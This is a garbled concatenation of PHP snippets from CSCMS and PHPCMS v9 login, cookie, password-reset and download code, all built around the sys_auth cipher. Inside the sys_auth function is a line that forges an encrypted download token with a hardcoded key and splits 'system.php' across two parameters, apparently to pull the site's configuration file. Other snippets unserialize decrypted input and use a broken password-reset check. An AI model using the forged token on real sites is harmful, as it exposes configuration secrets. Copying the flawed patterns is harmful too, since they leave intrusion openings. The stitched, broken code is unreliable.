function User_Login($cid = 0, $key = '')
{
if (!empty($key)) {
$key = unserialize(stripslashes(sys_auth($key, 'D')));
$id = isset($key['id']) ? intval($key['id']) : 0;
$logstr = isset($key['login']) ? $key['login'] : '';
} else {
$id = isset($_SESSION['cscms__id']) ? intval($_SESSION['cscms__id']) : 0;
$logstr = isset($_SESSION['cscms__login']) ? $_SESSION['cscms__login'] : '';
}
$user_id = intval($this->cookie->get_cookie('user_id'));
$user_login = $this->cookie->get_cookie('user_login');
$login = FALSE;
if ($id == 0 || empty($logstr)) {
if ($user_id > 0 && !empty($user_login)) {
//判断非法COOKIE
if (!preg_match('/^[0-9a-zA-Z]*$/', $user_login)) {
$userlogin = '';
}
$row = $this->db->query("SELECT id,name,code,pass,lognum,level,jinyan,cion,vip,logtime,viptime FROM " . CS_SqlPrefix . "user where id=" . $user_id . "")->row();
if ($row) {
//判断账号密码是否正确
if (md5($row->name . $row->pass . $row->code) == $user_login) {
//每天登陆加积分
if (User_Cion_Log > 0 && date("Y-m-d", $row->logtime) != date('Y-m-d')) {
$updata['cion'] = $row->cion + User_Cion_Log;
}
//判断VIP
if ($row->vip > 0 && $viptime < time()) {
$updata['vip'] = 0;
$updata['viptime'] = 0;
}
//判断等级
$level = getlevel($row->jinyan);
if ($level > $row->level) {
$updata['level'] = $level;
//发送等级通知
$add['uida'] = $row->id;
$add['uidb'] = 0;
$add['name'] = '用户等级升级通知';
$add['neir'] = '恭喜您,您的用户等级升级到Lv' . $level;
$add['addtime'] = time();
$this->CsdjDB->get_insert('msg', $add);
}
//修改登录时间
$updata['zx'] = 1;
$updata['lognum'] = $row->lognum + 1;
$updata['logtime'] = time();
$updata['logip'] = getip();
$updata['logms'] = time();
$this->CsdjDB->get_update('user', $user_id, $updata);
//登录日志
if (date("Y-m-d", $row->logtime) != date('Y-m-d')) {
$this->load->library('user_agent');
$agent = ($this->agent->is_mobile() ? $this->agent->mobile() : $this->agent->platform()) . ' / ' . $this->agent->browser() . ' v' . $this->agent->version();
$add['uid'] = $row->id;
$add['loginip'] = getip();
$add['logintime'] = time();
$add['useragent'] = $agent;
$this->CsdjDB->get_insert('user_log', $add);
}
$_SESSION['cscms__id'] = $row->id;
$_SESSION['cscms__name'] = $row->name;
$_SESSION['cscms__login'] = md5($row->name . $row->pass);
$login = TRUE;
}
}
}
} else {
$row = $this->db->query("SELECT id,name,pass,level,jinyan FROM " . CS_SqlPrefix . "user where id='{$id}'")->row();
if ($row) {
if (md5($row->name . $row->pass) == $logstr) {
$login = TRUE;
//判断等级
$level = getlevel($row->jinyan);
if ($level > $row->level) {
$updata['level'] = $level;
//发送等级通知
$add['uida'] = $row->id;
$add['uidb'] = 0;
$add['name'] = '用户等级升级通知';
$add['neir'] = '恭喜您,您的用户等级升级到Lv' . $level;
$add['addtime'] = time();
$this->CsdjDB->get_insert('msg', $add);
}
//改变在线秒数
$updata['zx'] = 1;
$updata['logms'] = time();
$this->CsdjDB->get_update('user', $id, $updata);
}
}
}
if (!$login) {
//清除非法登录
unset($_SESSION['cscms__id'], $_SESSION['cscms__name'], $_SESSION['cscms__login']);
//清除记住登录
$this->cookie->set_cookie("user_id");
$this->cookie->set_cookie("user_login");
if ($cid == 0) {
msg_url('您还没有登录或者登录已超时~!', userurl(site_url('user/login')));
}
} else {
//判断每天会员要删除的数据
$day = @file_get_contents(FCPATH . "cache/cscms_time/day.txt");
if (date('d') != $day) {
//清空每天分享,发布
$uedit['addhits'] = 0;
$this->CsdjDB->get_update('user', $_SESSION['cscms__id'], $uedit);
write_file(FCPATH . "cache/cscms_time/day.txt", date('d'));
}
}
return $login;
}
/**
* Cookie 设置、获取、删除
*
* @author liu21st <*****@*****.**>
* @lastmodify 2013-01-22 16:49:32 by mrmsl
*
* @param string $name 名称
* @param string $value 值。默认''
* @param array $option 参数设置。默认null
*
* @return mixed
*/
function cookie($name, $value = '', $option = null)
{
$config = array('prefix' => COOKIE_PREFIX, 'expire' => COOKIE_EXPIRE, 'path' => COOKIE_PATH, 'domain' => COOKIE_DOMAIN);
if (!empty($option)) {
//参数设置(会覆盖黙认设置)
if (is_numeric($option)) {
$option = array('expire' => $option);
} elseif (is_string($option)) {
parse_str($option, $option);
}
$config = array_merge($config, array_change_key_case($option));
}
if (is_null($name)) {
//清除指定前缀的所有cookie
if (empty($_COOKIE)) {
return;
}
//要删除的cookie前缀,不指定则删除config设置的指定前缀
$prefix = empty($value) ? $config['prefix'] : $value;
if (!empty($prefix)) {
//如果前缀为空字符串将不作处理直接返回
foreach ($_COOKIE as $key => $val) {
if (0 === stripos($key, $prefix)) {
setcookie($key, '', time() - 3600, $config['path'], $config['domain']);
unset($_COOKIE[$key]);
}
}
}
return;
}
$name = $config['prefix'] . $name;
if ('' === $value) {
return isset($_COOKIE[$name]) ? sys_auth($_COOKIE[$name], false) : null;
//获取指定Cookie
} else {
if (is_null($value)) {
//删除cookie
setcookie($name, '', time() - 3600, $config['path'], $config['domain']);
unset($_COOKIE[$name]);
//删除指定cookie
} else {
//设置cookie
$expire = !empty($config['expire']) ? time() + intval($config['expire']) : 0;
setcookie($name, sys_auth($value), $expire, $config['path'], $config['domain']);
$_COOKIE[$name] = $value;
}
}
}
public function check_status() {
$appid = isset($_GET['appid']) && intval($_GET['appid']) ? intval($_GET['appid']) : exit('0');
$applist = getcache('applist');
if(empty($applist)) {
/*写入应用列表缓存*/
$applist = $this->db->listinfo('', '', 1, 100, 'appid');
setcache('applist', $applist);
}
if (!empty($applist)) {
$param = sys_auth('action=check_status', 'ENCODE', $applist[$appid]['authkey']);
//如果填写ip则通信地址为ip地址,此时绑定了多个虚拟主机有可能出现错误
$appurl = !empty($applist[$appid]['ip']) ? 'http://'.$applist[$appid]['ip'].'/api/' : $applist[$appid]['url'];
$url = $appurl.$applist[$appid]['apifilename'];
if (strpos($url, '?')) {
$url .= '&';
} else {
$url .= "?";
}
if ($data = @file_get_contents($url.'code='.urlencode($param))) {
exit($data);
} else {
exit('0');
}
} else {
exit('0');
}
}
<?php
function sys_auth($string, $operation = 'ENCODE', $key = '', $expiry = 0)
{
$key_length = 4;
$key = md5($key != '' ? $key : pc_base::load_config('system', 'auth_key'));
$fixedkey = md5($key);
$egiskeys = md5(substr($fixedkey, 16, 16));
$runtokey = $key_length ? $operation == 'ENCODE' ? substr(md5(microtime(true)), -$key_length) : substr($string, 0, $key_length) : '';
$keys = md5(substr($runtokey, 0, 16) . substr($fixedkey, 0, 16) . substr($runtokey, 16) . substr($fixedkey, 16));
$string = $operation == 'ENCODE' ? sprintf('%010d', $expiry ? $expiry + time() : 0) . substr(md5($string . $egiskeys), 0, 16) . $string : base64_decode(substr($string, $key_length));
$i = 0;
$result = '';
$string_length = strlen($string);
for ($i = 0; $i < $string_length; $i++) {
$result .= chr(ord($string[$i]) ^ ord($keys[$i % 32]));
}
if ($operation == 'ENCODE') {
return $runtokey . str_replace('=', '', base64_encode($result));
} else {
if ((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26) . $egiskeys), 0, 16)) {
return substr($result, 26);
} else {
return '';
}
}
}
echo sys_auth('i=3&d=1&t=9999999999&ip=115.238.245.179&m=3&modelid=3&s=caches/configs/system.p&f=hp', 'ENCODE', '8fafb9a1932b309d809e6140772c661');
}
//执行本系统登陆操作
$userid = $userinfo['userid'];
$groupid = $userinfo['groupid'];
$username = $userinfo['username'];
$password = $userinfo['password'];
$nickname = $userinfo['nickname'];
$db->update(array('lastip' => ip(), 'lastdate' => SYS_TIME), array('userid' => $userid));
pc_base::load_sys_class('param', '', 0);
if (!$cookietime) {
$get_cookietime = param::get_cookie('cookietime');
}
$_cookietime = $cookietime ? intval($cookietime) : ($get_cookietime ? $get_cookietime : 0);
$cookietime = $_cookietime ? TIME + $_cookietime : 0;
$phpcms_auth_key = md5(pc_base::load_config('system', 'auth_key') . $_SERVER['HTTP_USER_AGENT']);
$phpcms_auth = sys_auth($userid . "\t" . $password, 'ENCODE', $phpcms_auth_key);
header('P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"');
param::set_cookie('auth', $phpcms_auth, $cookietime);
param::set_cookie('_userid', $userid, $cookietime);
param::set_cookie('_username', $username, $cookietime);
param::set_cookie('_nickname', $nickname, $cookietime);
param::set_cookie('_groupid', $groupid, $cookietime);
param::set_cookie('cookietime', $_cookietime, $cookietime);
exit('1');
}
/**
* 同步退出
*/
if ($action == 'synlogout') {
header('P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"');
pc_base::load_sys_class('param', '', 0);
/**
* 获取通过 set_cookie 设置的 cookie 变量
* @param string $var 变量名
* @param string $default 默认值
* @return mixed 成功则返回cookie 值,否则返回 false
*/
public static function get_cookie($var, $default = '')
{
$var = pc_base::load_config('system', 'cookie_pre') . $var;
return isset($_COOKIE[$var]) ? sys_auth($_COOKIE[$var], 'DECODE') : $default;
}
/**
* 手机短信方式找回密码
*/
public function public_forget_password_mobile()
{
$email_config = getcache('common', 'commons');
$this->_session_start();
$member_setting = getcache('member_setting');
if (isset($_POST['dosubmit'])) {
//处理提交申请,以手机号为准
if ($_SESSION['code'] != strtolower($_POST['code'])) {
showmessage(L('code_error'), HTTP_REFERER);
}
$mobile = $_POST['mobile'];
$mobile_verify = intval($_POST['mobile_verify']);
$password = $_POST['password'];
$pwdconfirm = $_POST['pwdconfirm'];
if ($password != $pwdconfirm) {
showmessage(L('passwords_not_match'), HTTP_REFERER);
}
//验证手机号和传递的验证码是否匹配
$sms_report_db = pc_base::load_model('sms_report_model');
$sms_report_array = $sms_report_db->get_one(array("mobile" > $mobile, 'in_code' => $mobile_verify));
if (empty($sms_report_array)) {
showmessage("手机和验证码不对应,请通过正常渠道修改密码!", HTTP_REFERER);
}
//更新密码
$updateinfo = array();
$updateinfo['password'] = $password;
$this->db->update($updateinfo, array('userid' => $this->memberinfo['userid']));
if (pc_base::load_config('system', 'phpsso')) {
//初始化phpsso
$this->_init_phpsso();
$res = $this->client->ps_member_edit('', $email, $_POST['info']['password'], $_POST['info']['newpassword'], $this->memberinfo['phpssouid'], $this->memberinfo['encrypt']);
}
$memberinfo = $this->db->get_one(array('email' => $_POST['email']));
if (!empty($memberinfo['email'])) {
$email = $memberinfo['email'];
} else {
showmessage(L('email_error'), HTTP_REFERER);
}
pc_base::load_sys_func('mail');
$phpcms_auth_key = md5(pc_base::load_config('system', 'auth_key') . $this->http_user_agent);
$code = sys_auth($memberinfo['userid'] . "\t" . SYS_TIME, 'ENCODE', $phpcms_auth_key);
$url = APP_PATH . "index.php?m=member&c=index&a=public_forget_password&code={$code}";
$message = $member_setting['forgetpassword'];
$message = str_replace(array('{click}', '{url}'), array('<a href="' . $url . '">' . L('please_click') . '</a>', $url), $message);
//获取站点名称
$sitelist = getcache('sitelist', 'commons');
if (isset($sitelist[$memberinfo['siteid']]['name'])) {
$sitename = $sitelist[$memberinfo['siteid']]['name'];
} else {
$sitename = 'PHPCMS_V9_MAIL';
}
sendmail($email, L('forgetpassword'), $message, '', '', $sitename);
showmessage(L('operation_success'), 'index.php?m=member&c=index&a=login');
} else {
$siteid = isset($_REQUEST['siteid']) && trim($_REQUEST['siteid']) ? intval($_REQUEST['siteid']) : 1;
$siteinfo = siteinfo($siteid);
include template('member', 'forget_password_mobile');
}
}
function downfiles($field, $value)
{
extract(string2array($this->fields[$field]['setting']));
$list_str = array();
$file_list = string2array($value);
if (is_array($file_list)) {
foreach ($file_list as $_k => $_v) {
if ($_v[fileurl]) {
$filename = $_v[filename] ? $_v[filename] : L('click_to_down');
if ($downloadlink) {
$a_k = urlencode(sys_auth("i={$this->id}&s=&m=1&f={$_v['fileurl']}&d={$downloadtype}&modelid={$this->modelid}&catid={$this->catid}", 'ENCODE', pc_base::load_config('system', 'auth_key')));
$list_str[] = "<a href='" . APP_PATH . "index.php?m=content&c=down&a_k={$a_k}' target='_blank'>{$filename}</a>";
} else {
$list_str[] = "<a href='{$_v[fileurl]}' target='_blank'>{$filename}</a>";
}
}
}
}
return $list_str;
}
private function get_admin_manage_code()
{
$pc_auth_key = md5(pc_base::load_config('system', 'auth_key') . 'adminuser');
$code = sys_auth("adminuser_" . $_GET[pc_hash] . "_" . time(), 'ENCODE', $pc_auth_key);
return $code;
}
/**
* 文本转换为图片
* @param string $txt 图形化文本内容
* @param int $fonttype 无外部字体时生成文字大小,取值范围1-5
* @param int $fontsize 引入外部字体时,字体大小
* @param string $font 字体名称 字体请放于phpcms\libs\data\font下
* @param string $fontcolor 字体颜色 十六进制形式 如FFFFFF,FF0000
*/
function string2img($txt, $fonttype = 5, $fontsize = 16, $font = '', $fontcolor = 'FF0000', $transparent = '1')
{
if (empty($txt)) {
return false;
}
if (function_exists("imagepng")) {
$txt = urlencode(sys_auth($txt));
$txt = '<img src="' . APP_PATH . 'api.php?op=creatimg&txt=' . $txt . '&fonttype=' . $fonttype . '&fontsize=' . $fontsize . '&font=' . $font . '&fontcolor=' . $fontcolor . '&transparent=' . $transparent . '" align="absmiddle">';
}
return $txt;
}
<?php
defined('IN_PHPCMS') or exit('No permission resources.');
$txt = trim($_GET['txt']);
if (extension_loaded('gd') && $txt) {
header("Content-type: image/png");
$txt = urldecode(sys_auth($txt, 'DECODE'));
$fontsize = isset($_GET['fontsize']) ? intval($_GET['fontsize']) : 16;
$fontpath = PC_PATH . 'libs' . DIRECTORY_SEPARATOR . 'data' . DIRECTORY_SEPARATOR . 'font' . DIRECTORY_SEPARATOR;
$fontfile = isset($_GET['font']) && !empty($_GET['font']) ? $fontpath . trim($_GET['font']) : $fontpath . 'georgia.ttf';
$fontcolor = isset($_GET['fontcolor']) && !empty($_GET['fontcolor']) ? trim($_GET['fontcolor']) : 'FF0000';
$fontcolor_r = hexdec(substr($fontcolor, 0, 2));
$fontcolor_g = hexdec(substr($fontcolor, 2, 2));
$fontcolor_b = hexdec(substr($fontcolor, 4, 2));
if (file_exists($fontfile)) {
//计算文本写入后的宽度,右下角 X 位置-左下角 X 位置
$image_info = imagettfbbox($fontsize, 0, $fontfile, $txt);
$imageX = $image_info[2] - $image_info[0] + 10;
$imageY = $image_info[1] - $image_info[7] + 5;
//print_r($image_info);
$im = @imagecreatetruecolor($imageX, $imageY) or die("Cannot Initialize new GD image stream");
$white = imagecolorallocate($im, 255, 255, 255);
$font_color = imagecolorallocate($im, $fontcolor_r, $fontcolor_g, $fontcolor_b);
imagecolortransparent($im, $white);
//背景透明
imagefilledrectangle($im, 0, 0, $imageX, $imageY, $white);
$txt = iconv(CHARSET, "UTF-8", $txt);
imagettftext($im, $fontsize, 0, 5, $imageY - 5, $font_color, $fontfile, $txt);
} else {
$imageX = strlen($txt) * 9;
$im = @imagecreate($imageX, 16) or die("Cannot Initialize new GD image stream");
